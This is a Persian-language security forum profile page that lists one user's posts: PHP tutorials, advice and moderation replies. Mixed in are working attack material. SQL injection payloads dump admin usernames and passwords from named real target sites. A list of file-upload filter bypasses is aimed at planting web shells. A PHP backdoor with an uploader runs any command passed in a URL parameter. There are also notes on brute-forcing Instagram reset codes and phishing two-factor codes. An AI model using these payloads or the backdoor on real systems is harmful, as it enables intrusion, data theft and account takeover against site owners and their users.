رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

MR.MSA

جاویدان
  • ارسال ها

    484
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    46

تمامی موارد ارسال شده توسط MR.MSA

  1. درسته، گفتم شاید سوال بقیه هم باشه. این ویدیو رو نگاه کن زمانی که به ۴۰ تا افزایش پیدا میکنه بعد با ای پی هایی که داره تست میکنه اما اینجور که من دیدم تعداد سرور هاش نمیتونسته 1000000 کد رو پوشش بده برای همین مثلا ممکنه ۱۰ دقیقه اول جواب نده اما چند تا ده دقیقه تست کنه میشه و بستگی به شانستون داره. و با توجه به چیزی که گفته بود اگر تعداد ای پی هایی که داری رو خیلی زیاد کنی که همه کد ها رو پوشش بده قطعا همون ۱۰ دقیقه اول جواب میگیری. و این یه نمونست و نمونه های خیلی زیادی داریم.
  2. سلام اول اینکه یعنی چی نمیشه اینستا رو هک کرد ؟ "امنیت هیچ وقت صد در صد نیست" و اتفاقا یه امنیت کار باگی رو از اینستا گرفته بود فک کنم ۲۰،۰۰۰ دلار بانتی داده بودن که میشد هر اکانتی رو توی ۱۰ دقیقه زد با یه سری شرایط و... که تعداد دفعات برای تست کد فورگت پسورد رو افزایش میداد مثلا ۴۰ بار و با یه اسکریپت php کد های ۶ رقمی رو تست میکرد با سرور هایی که داشت و یه همچین چیزی. رایت تاپش هم منتشر شد ... و اکسپلویت های 0day و کلی چیز دیگه قرار بر این نیست هر روش و متدی هست پابلیک باشه و.. در ضمن میشه همون تایید دو مرحله ای رو هم به فیشینگ اضافه کرد باز با همون مهندسی اجتماعی هم میشه هم پسورد رو گرفت و هم کد دو مرحله ای! @C0d3!Nj3ct!0n لطفا تاپیک رو قفل کنید. موفق باشید.
  3. خب نکته همینجاست احتمال داره کسی به سیستمتون دسترسی نداشته باشه و سیستم ویروسی شده باشه.
  4. ویدئو شماره چهل و سوم تارگت: ise.ac Tables: [Hidden Content],group_concat(table_name)+from+information_schema.tables+where+table_schema=database()--+ Columns: [Hidden Content],group_concat(column_name)+from+information_schema.columns+where+table_name=%27admin%27--+ Informations: [Hidden Content],group_concat(username,0x3a,password)+from+admin--+ In source , line 1345
  5. از کجا میدونید شخصی دسترسی به سیستمتون داره؟ چه نشونه هایی میشه در این رابطه توضیح بدید.
  6. سلام اول گفته باشم که از یک شل اختصاصی استفاده کنید چون فایروال شل هایی مثل الفا رو میشناسه. بایپس های مختلفی وجود داره که یک سری رو اینجا قرار میدم: .php5 .php7 .PhP .php;.png .php%00.png و همچنین میتونید header رو تغییر بدید با ابزار برپ سویت و از اون طریق هم تست کنید. اگر سرچ کنید بایپس های rfu توی یوتیوب ویدئو زیاده. موفق باشید.
  7. سلام دوست عزیز انجمن گارد ایران به هیچ وجه پروژه قبول نمیکنه و این کار شما خلاف قوانین هست در ضمن اینکار میتونه زیان اور باشه برای خیلی ها و کار درستی نیست! (bitcoin) لطفا قبل از فعالیت قوانین رو مطالعه کنید.
  8. MR.MSA

    آموزش تابع file_get_contents در php

    با سلام خدمت دوستان عزیز تابع file_get_contents در php یک از توابع مدیریت فایل ها در این زبان است . این تابع تمام اطلاعات داخل فایل یا url داده شده را به عنوان یک رشته می خواند . خواندن فایل: $data = file_get_contents('file.txt'); echo $data; در اینجا محتویات فایل file.txt به صورت رشته در متغیر data ذخیره میشود. خواندن فایل از ادرس: $data = file_get_contents('[Hidden Content]'); echo $data; در این کد محتوایت این ادرس که به صورت txt هست در متغیر data ذخیره و در خط دوم نمایش داده میشود. موفق و پیروز باشید.
  9. با سلام دوست عزیز پیشنهاد من اینه که یک زمینه رو انتخاب کنید و وقت اصلی رو روی اون بزارید و بعد برید سراغ یک زمینه دیگه خیلی از کسانی که وارد دنیای امنیت میشن به همه زمینه های مختلف هکینگ علاقه دارن اما بهتره که اول یک زمینه رو تخصصی کار کنید و اینکه در تست و نفوذ برنامه نویسی یکی از مهم ترین چیزایی هست که شما باید بلد باشید و چه خوب که شما هم به برنامه نویسی خیلی علاقه دارید اما نکته قابل توجه برای اینکه چه زبان برنامه نویسی رو انتخاب کنید بر میگرده به زمینه ای که بهش علاقه دارید و بهتره یکم در این باره تحقیق کنید البته پیشنهاد من برای وب php هستش. و برای یادگیری میتونید از مطالب سایت های معتبر مثل owasp استفاده کنید که واقعا عالی هستند یا از ویدئو های یوتیوب آموزشی و همچنین از کتاب و دوره های رایگان اگر هم میتونید هزینه کنید دوره های مختلف توی سایت های ایرانی به زبان فارسی هست هم برای برنامه نویسی و هم برای تست و نفوذ که میتونید خریداری کنید. با تشکر. منابع انگلیسی : owasp.org exploit-db.com youtube.com medium.com
  10. MR.MSA

    Nmap Online

    با سلام خدمت دوستان عزیز توی این تاپیک میخوام یک سایت رو معرفی کنم که به صورت آنلاین nmap رو در اختیار دارید و میتونید اسکن کنید. (هر چند شاید نتونه جای خود nmap رو بگیره) آدرس : [Hidden Content] و همچنین میتونید از اسکنر shodan استفاده کنید که توی موارد مختلف کاربرد داره : shodan.io و این سایت رو هم جدید بررسی کردم سرعت خیلی خوبه داری و یک رنج ip میدید و اسکن میکنه : [Hidden Content] موفق و پیروز باشید.
  11. MR.MSA

    بررسی نحوه کارکرد افزونه wappalyzer

    با سلام خدمت دوستان عزیز در این ویدئو نحوه پیدا کردن یک سری از نتایجی که افزونه wappalyzer به ما میده رو گفتیم و امیدوارم از این ویدئو لذت ببرید. در ضمن توجه داشته باشید که ویدئو تقریبا یک هفته پیش یا بیشتر گرفته شده ممکنه وقتی با افزونه wappalyzer نتایج رو نگاه میکنید متفاوت باشه مثل cloud flare که جدید اد شده توسط مدیریت. لینک ویدئو: [Hidden Content]
  12. MR.MSA

    تابع ساده ساخت لاگ با php

    با سلام خدمت دوستان در این ویدئو یک تابع ساده رو با php نوشتم جهت ساخت لاگ و بررسی بازدید کنندگان یک صفحه که در ویدئو های بعد این رو ارتقا میدیم. لینک ویدئو در آپارات: [Hidden Content] کد ها: <?php function add_log($dir){ $dir = 'logs'; $filename = $dir.'/'.$_SERVER['REMOTE_ADDR'].'.php'; if(!is_file($filename)){ $fh = fopen($filename,'a'); fwrite($fh,"<?php die(); ?>\n"); fclose($fh); } $log = "Date: ".date('Y/m/d h:i:s')." User Agent: ".$_SERVER['HTTP_USER_AGENT']." URL: ".$_SERVER['REQUEST_URI']."\n"; $fh = fopen($filename,'a'); fwrite($fh,$log); fclose($fh); } add_log('logs'); موفق و پیروز باشید.
  13. با سلام نمیشه گفت وقتی یک باگ رو پیدا میکنید اکسپلویتش کنید و سوال شما یکم مشکل داره فرض میکنیم سایت guardiran.org رو اسکن کردی و باگ rfu رو گرفتی الان شما میتونی مثلا سایت رو دیفیس کنی و توی zone-h.org ثبت کنی! اما نمیتونی توی exploit-db.com ثبتش کنی و توی cxsecurity هم احتمالش کمه ثبت بشه حالا چه زمانی میتونید اکسپلویت کنید ؟ مثلا فرض کن از یک افزونه وردپرس به اسم contact form 7 باگ گرفتی حالا هر سایتی که اون افزونه رو داره این باگ رو هم داره و میتونی توی exploit-db.com و cxsecurity.com ثبتش کنی یا مثلا از یک cms باگ گرفتی که باگت جوری هست که بشه توی سایت های دیگه هم ازش استفاده کرد ولی وقتی از گاردایران یه باگ رو میگیری اینکه بتونی جاهای دیگه پیداش کنی شرایط خاص خودشو داره و خیلی وقتا نمیشه مگر اینکه مثلا گاردایران از IPS هست و تو از IPS باگ بگیری که اون موقع میتونی اکسپلویت کنی البته اکسپلویت نوع های دیگه هم داره فقط صرفا این نیست که بگی همه سایت های IPS مثلا sqli داره فرض کن یک باگ پرایوت هست و مراحل خاص خودشو داره یا یه برنامه اختصاصی براش نوشتی و.. که بیشتر اکسپلویت ها با php,ruby,perl,python هست سایت هایی که برای اکسپلویت میتونید استفاده کنید: exploit-db.com exploit-db.ga cxsecurity.com 0day.today securityfocus.com packetstormsecurity.com exploit-author.com and.... موفق و پیروز باشید.
  14. با سلام دوست عزیز وقتی میبینید توی sqlmap مشکل دارید دستی تست کنید، هر چند من توی sqlmap تست نکردم دیگه تا کالی رو بالا بیارم دستی تست کردم اوکی بود tables: [Hidden Content],/*!12345group_concat(table_name)*/,3,4,5,6,7,8,9,10+/*!12345from*/+/*!12345information_schema.tables*/+where+table_schema=database()-- columns: [Hidden Content],/*!12345group_concat(column_name)*/,3,4,5,6,7,8,9,10+/*!12345from*/+/*!12345information_schema.columns*/+where+table_name=%27login%27-- user , pass for login : [Hidden Content],/*!12345group_concat(username,0x3a,password)*/,3,4,5,6,7,8,9,10+/*!12345from*/+login--
  15. با سلام و عرض ادب دوست عزیز تاپیک برای سایت ۹۸ هست! احتمالا ایشون تا الان مشکلشون حل شده و اینکه قرار دادن لینک درست نیست! لطفا قوانین رو مطالعه کنید. موفق باشید.
  16. با سلام خدمت دوستان از اینکه چند وقتی بود این تاپیک اپدیت نشده بود خیلی عذر میخوام یکم درگیر پروژه های دیگه برای گاردایران بودم انشالله از امروز این تاپیک دوباره آپدیت میشه. ویدئوی چهل و دوم لینک تارگت: [Hidden Content],2,3,group_concat(name,0x3a,password),5,6,7,8,9,10,11+from+login--+ ویدئو در آپارات : [Hidden Content] ویدئو در یوتیوب : دوستان یادتون نره که حتما چنل آپارات و یوتیوب رو ساب کنید و ویدئو رو لایک کنید. موفق و پیروز باشید.
  17. MR.MSA

    چت روم در دارک وب

    با سلام دوست عزیز میتونید از موتور جستجوی Ahmia استفاده کنید که برای سرچ در دارک وب به کار میره. [Hidden Content] شاید بتونه بهتون کمک کنه. همچنین میتونید از داک داک گو و دیگر موتور های جستجو استفاده کنید. اطلاعات بیشتر: [Hidden Content] موفق و پیروز باشید.
  18. MR.MSA

    دورک

    با سلام من فقط بایپس های پیج ادمین رو گذاشته بودم و اینا اکثرا ثابت هستند توی تقریبا ۸۰ درصد مطالبی پیج ادمین این پیلود ها هم هست و نمیشه گفت کپی برداری مثل این میمونه که یک نفر دستور پرینت php رو بزاره و یک نفر توی یه انجمن دیگه همین دستورو بزاره یعنی میخوام بگم کلا یکیه ولی اینکه @sparta دقیقا با همون ترتیب از یک مطلب گذاشته بدون توضیح خاصی و هم دورک ها قدیمه و اگه اشتباه نکنم توی انجمن هم موجوده! همچنین بایپس های پیج ادمین رو هم که بنده قرار دادم پس در نتیجه تاپیک تکراریه. موفق باشید.
  19. MR.MSA

    صفحه ثبت نام و ورود بدون دیتابیس | با PHP

    با سلام خدمت دوستان عزیز امروز میخوایم باهم یک صفحه ورود بدون داشتن دیتابیس بسازیم که در کنارش صفحه ثبت نام هم موجوده و کاربران میتونن ثبت نام کنن. نوشتن صفحه ثبت نام: قدم اول :خب قدم اول توی نوشتن صفحه ثبت ناممون کد های html هست که یک فایل با نام register.php بسازید و کد های زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> در اینجا چهار input داریم که شامل نام کاربری، رمز عبور ، تکرار رمز عبور و ایمیل میشه و در نهایت یک دکمه ثبت نام. قدم دوم : یک فایل با نام users.php بسازید و این کد رو خط اول قرار بدید: <?php die('403'); ?> خب در فایل users.php اطلاعات کاربران اعم از username و password و email قرار میگیره که از تابع die اول کدمون استفاده کردیم که اگر یک نفر این فایل رو توی سایت اجرا کرد خطای 403 بگیره. قدم سوم: حالا برمیگردیم به فایل register.php که کد های php اونو بزنیم یعنی: <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } خط ۲ : از if استفاده کردیم برای بررسی اینکه کاربر دکمه register رو کلیک کرده یا نه خط ۴ : بررسی کردیم که ایا تمام ایپویت ها رو وارد کرده کاربر یا نه خط ۶ : بررسی کردیم که آیا رمز عبود و تکرار رمز عبور دقیقا یکی هست یا نه اگه آره که بریم سراغ اضافه کردن کاربر خط ۱۰ : وارد فایل users.php که قبلا ساختیم میشیم و میشه file handle ما خط ۱۳ : توی متغیر user اطلاعات کاربر رو قرار میدم یعنی نام کاربری ، رمز عبود و ایمیل که نام کاربری و رمز عبود به صورت هش شده و ایمیل به صورت encode قرار میگیره. خط ۱۶ : با تابع fwrite در آخر فایل users.php متغیر user رو اضافه میکنیم. خط ۱۹ : فایل users.php رو میبندیم خط ۲۲ و ۲۳ : نمایش خطا زمانی که تمام اینپوت ها رو کاربر وارد نکرده که میشه else شرطمون (خط ۴) کد نهایی: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> Confirm password: <input type="password" name="confirm_password"> <br><br> Email: <input type="email" name="email"> <br><br> <input type="submit" name="register" value="register"> </form> </body> </html> <?php if (isset($_POST['register'])) { if (!$_POST['username']==''&&!$_POST['password']==''&&!$_POST['confirm_password']==''&&!$_POST['email']==''){ // check confirm password if ($_POST['password']==$_POST['confirm_password']) { // add user // open file (file handle) $fh = fopen('users.php','a'); // set user data $user = 'USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:'.base64_encode($_POST['email'])."\n"; // write user information fwrite($fh,$user); // close users file fclose($fh); } }else{ echo '<p style="color:red">Please answer all options.</p>'; } } نوشتن صفحه ورود: قدم اول: یک فایل با نام login.php بسازید و کد های html زیر رو قرار بدید: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> (اگه دوست داشته باشید میتونید بهش استایل هم بدید ولی برای اینکه آموزش طولانی نشه ما اینکارو نمیکنیم) قدم دوم : کد های php: <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } خب به صورت کلی بخوایم توضیح بدیم که چه اتفاقی افتاده میگیم که اول چک میکنه که ایا username,password ارسال شده یا نه بعد میاد فایل users.php رو باز میکنه با mode خواندن یا read بعد متغیر users رو مساوی با داده های فایل users.php قرار میده حالا میایم دوباره متغیر users رو تعریف میکنیم و با استفاده از تابع explode هر اینتری که توی فایل هست(میشه همون متغیر users) رو توی یک اندیس ارایه قرار میدم. یک متغیر user_id هم تعریف میکنیم چون بعدا ازش میخوایم استفاده کنیم خطای undefined var نده بهمون توی for میایم روی اندیس های آرایه users کار میکنیم و با یک if دونه دونه یوزر ها رو بررسی میکنیم با هش شده ی یوزرنیمی که برامون ارسال شده بعد اگر درست بود یعنی اون اندیس یا همون خط، اطلاعات یوزر ما هست که قرارش میدیم توی user_id و البته از .= که استفاده کردیم به این معنیه : $user_id = $user_id + $users[$i]; که اگر از قبل user_id رو تعریف نمیکردیم خطا میداد و دلیل اینکه از .= استفاده کردیم این بود که قراره توی بخش های بعد ازش استفاده کنیم. خب بعد اومدیم دوباره با یک if بررسی کردیم و با تابع strstr چک کردیم که آیا پسورد (به صورت هش شده) وجود داره توی اون اندیس یا نه در واقع پسورد رو بررسی میکنیم. و اگر درست بود میایم متغیر لاگین رو مساوی با true قرار میدیم که یعنی این شخص لاگینش انجام شده. جلوتر میایم میگیم اگر login شده بود بیا توی این شرط که اول میایم ایمیل رو از اون user خارج میکنیم و میزاریم توی متغیر email که روش های مختلفی میشه این کارو انجام داد ولی من از str_replace استفاده کردم حتی از explode هم میشه استفاده کرد و... در نهایت session رو استارت کردیم و session ها رو ست کردیم که من اومدم name رو مساوی با یوزر نیم و email رو مساوی با ایمیل شخص (با توجه به یوزرنیم و پسوردی که وارد کرده) به صورت دیکد قرار دادم. و هدر کردم به پنل که شما میتونید این قسمتش رو با توجه به کاری که میخواید انجام بدید تغییر بدید. و یک else هم داریم برای زمانی که یوزر و پسورد اشتباه هست ارور بده. کد نهایی پیج لاگین: <!DOCTYPE html> <html> <head> </head> <body> <form method="post"> Username: <input type="text" name="username"> <br><br> Password: <input type="password" name="password"> <br><br> <input type="submit" name="login" value="login"> </form> </body> </html> <?php if (isset($_POST['login'])&&isset($_POST['username'])&&isset($_POST['password'])) { $file_handle= fopen('users.php','r'); $users=fread($file_handle,filesize('users.php')); $users=explode("\n",$users); $user_id=''; for ($i=0;$i<count($users)-1;$i++) { // check username if (strstr($users[$i],md5(sha1($_POST['username'])))) { $user_id .= $users[$i]; // check password if (strstr($user_id,md5(sha1($_POST['password'])))) { $login='true'; } } } if (isset($login)&&$login=='true') { $user_email = str_replace('USERNAME:'.md5(sha1($_POST['username'])).',PASSWORD:'.md5(sha1($_POST['password'])).',EMAIL:','',$user_id); session_start(); $_SESSION['login']='true'; $_SESSION['name']=$_POST['username']; $_SESSION['email']=base64_decode($user_email); header('Location: panel.php'); exit; }else{ echo '<p style="color:red;">username and password is wrong!</p>'; } } نکته:‌ دوستان عزیز توی پیج ریجستر یک باگ خطرناک داریم که به شکل یک چالش میتونید بهش نگاه کنید، اگر دوستان تمایل داشتید در پایین تاپیک باگ رو ارائه بدید و همچنین نحوه پچ کردنش چون احتملا تا چند روز دیگه ادامه تاپیک نحوه بستن آسیب پذیری و نحوه استفاده از اون رو گداشتیم و یکم ریزه کاری پیج لاگین. موفق و پیروز باشید.
  20. MR.MSA

    ارتقا کاربر proxy

    با سلام بنده به @proxy عزیز تبریک میگم و واقعا لیاقتشو داشت. همچنین تشکر میکنم بابت زحماتت و ایشالا همیشه توی همه زمینه ها موفق باشی.❤️ شیرینی یادت نره داداش 😉
  21. با سلام دوست عزیز لطفا اسپم نکنید سوالات درمورد رد فریمورک رو در قسمت مربوطه بپرسید. لینک دانلود: [Hidden Content] لینک گیت هاب: کیت جامع کیت کنسول رد جی اس هسته کیت جامع هسته کیت کنسول
  22. با سلام خیلی ممنون از @Bs0d اما میتونید از این آپلودر هم استفاده کنید برای بک دور خیلی کاربردیه. <? if ($_GET['news']=='true') { $docr = $_SERVER["DOCUMENT_ROOT"]; echo <<<HTML <table> <form enctype="multipart/form-data" action="$self" method="POST"> <input type="hidden" name="ac" value="upload"> <tr> <td><font size="1">Your File : </font> </td> <td> <input size="48" name="file" type="file" style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"></td> </tr> <tr> <td><font size="1">Upload Dir : </font> </td> <td> <input size="48" value="$docr/" name="path" type="text" style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"> <input type="submit" value="Upload " style="color: #008000; font-family: Arial; font-size: 8pt; font-weight: bold; border: 2px solid #008000; background-color: #000000"></td> $tend </table> HTML; if (isset($_POST["path"])){ $uploadfile = $_POST["path"].$_FILES["file"]["name"]; if ($_POST["path"]==""){$uploadfile = $_FILES["file"]["name"];} if (copy($_FILES["file"]["tmp_name"], $uploadfile)) { echo "File uploaded to : $uploadfile\n"; echo "- Size : " .$_FILES["file"]["size"]. "\n"; } else { print "Error Upload File :\n"; } } } ?> <?php if(!empty($_GET['cmd'])){ echo'<pre>'; passthru($_GET['cmd']); echo'</pre>'; exit; } ?> توجه داشته باشید که زمان آپلود فایل باید کنار آدرس فایل پارامتر گت news رو مساوری با true قرار بدی. مثال: site.com/images/uploader.php?news=true موفق باشید.
×
×
  • ایجاد مورد جدید...